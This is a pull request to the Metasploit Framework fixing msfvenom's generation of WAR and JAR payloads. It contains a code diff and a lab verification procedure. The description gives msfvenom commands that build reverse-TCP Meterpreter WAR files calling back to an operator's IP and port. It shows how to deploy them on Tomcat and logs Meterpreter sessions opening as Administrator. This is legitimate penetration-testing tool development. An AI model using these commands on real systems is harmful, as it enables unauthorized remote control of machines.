### PR TITLE
[SeeRM #8724] Fix msfvenom when generating war/jar payloads

### DIFF
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1705,7 +1705,7 @@ def self.to_vba(framework,code,opts={})
       tmp_plat = plat.platforms if plat
       tmp_plat ||= Msf::Module::PlatformList.transform('win')
       exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, code, exeopts)
-      output = Msf::Util::EXE.to_jsp_war(exe)
+      output = Msf::Util::EXE.to_jsp_war(exe) if exe
 
     when 'psh'
       output = Msf::Util::EXE.to_win32pe_psh(framework, code, exeopts)

--- a/msfvenom
+++ b/msfvenom
@@ -468,7 +468,7 @@ class MsfVenom
     # possible
     when "war"
       exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
-      if (!exe && payload && payload.respond_to?(:generate_war) && @opts[:platform].index(Msf::Module::Platform::Java))
+      if (!exe && payload && payload.respond_to?(:generate_war))
         exe = payload.generate_war.pack
       end
       if exe
@@ -481,7 +481,7 @@ class MsfVenom
     # payload if possible
     when "java"
       exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
-      if (!exe && payload && payload.respond_to?(:generate_jar) && @opts[:platform].index(Msf::Module::Platform::Java))
+      if (!exe && payload && payload.respond_to?(:generate_jar))
         exe = payload.generate_jar.pack
       end
       if exe

--- a/msfvenom
+++ b/msfvenom
@@ -375,7 +375,7 @@ class MsfVenom
       if payload.nil?
         raise UsageError, "Invalid payload: #{@opts[:payload]}"
       end
-      payload.datastore.merge! @datastore
+      payload.datastore.merge!(@datastore)
     end
 
 

--- a/msfvenom
+++ b/msfvenom
@@ -370,6 +370,15 @@ class MsfVenom
     payload_raw = generate_raw_payload
     return unless payload_raw
 
+    unless @opts[:payload].nil? or @opts[:payload] == 'stdin'
+      payload = framework.payloads.create(@opts[:payload])
+      if payload.nil?
+        raise UsageError, "Invalid payload: #{@opts[:payload]}"
+      end
+      payload.datastore.merge! @datastore
+    end
+
+
     if @opts[:template]
       unless File.exist?(@opts[:template])
         raise NoTemplateError, "Template file (#{@opts[:template]}) does not exist"
@@ -459,16 +468,20 @@ class MsfVenom
     # possible
     when "war"
       exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
-      if (!exe && payload.respond_to?(:generate_war))
+      if (!exe && payload && payload.respond_to?(:generate_war) && @opts[:platform].index(Msf::Module::Platform::Java))
         exe = payload.generate_war.pack
       end
-      @out.write exe
+      if exe
+        @out.write exe
+      else
+        print_error("Could not generate payload format")
+      end
 
     # Same as war, special-case this so we can build a jar directly from the
     # payload if possible
     when "java"
       exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts)
-      if (!exe && payload.respond_to?(:generate_jar))
+      if (!exe && payload && payload.respond_to?(:generate_jar) && @opts[:platform].index(Msf::Module::Platform::Java))
         exe = payload.generate_jar.pack
       end
       if exe


### PR DESCRIPTION
While reviewing https://github.com/rapid7/metasploit-framework/pull/2794 we discovered msfvenom was really broken when generating war/jar payloads. The initial pull request from @Meatballs1 tried to fix some problems with msfvenom: https://dev.metasploit.com/redmine/issues/8724

This pull request tries to fix an still broken msfvenom. It should finally solve https://dev.metasploit.com/redmine/issues/8724. 

We are submitting a new pull request because @Meatballs1 is away from computers for some days, so hopefully this one can be reviewed by someone else and msfvenom is fixed asap.

**Verification**
- [ ] create a war from a Java .class payload (like java/meterpreter/reverse_tcp) 

```
./msfvenom -p java/meterpreter/reverse_tcp -f war LHOST=192.168.172.1 LPORT=4444 > /tmp/app.war
```
- [ ] Deploy the WAR on a Windows tomcat server
- [ ] Run the msfconsole, run the exploit/multi/handler module, set the java payload and hopefully enjoy a session when running the payload 

```
msf exploit(handler) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (30355 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1536) at 2013-12-30 09:24:18 -0600

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
eComputer    : juan-c0de875735
OS          : Windows XP 5.1 (x86)
Meterpreter : java/java
meterpreter > exit
```
- [ ] create a war from a native payload (like windows/meterpreter/reverse_tcp)

```
./msfvenom -p windows/meterpreter/reverse_tcp -f war LHOST=192.168.172.1 LPORT=4444 > /tmp/app2.war
```
- [ ] Deploy the WAR on a Windows tomcat server running JAVA <7u21(patched version)
- [ ] Run the msfconsole, run the exploit/multi/handler module, set the native payload and hopefully enjoy a session when running the payload 
- [ ] Deploy the WAR on a Windows tomcat server running JAVA >7u21
- [ ] Run the msfconsole, run the exploit/multi/handler module, set the native payload and hopefully enjoy a session when running the payload 
- [ ] Deploy the WAR on a Windows tomcat server running JAVA 6
- [ ] Run the msfconsole, run the exploit/multi/handler module, set the native payload and hopefully enjoy a session when running the payload 

```
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.244:1537) at 2013-12-30 09:25:45 -0600

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
eArchitecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
```
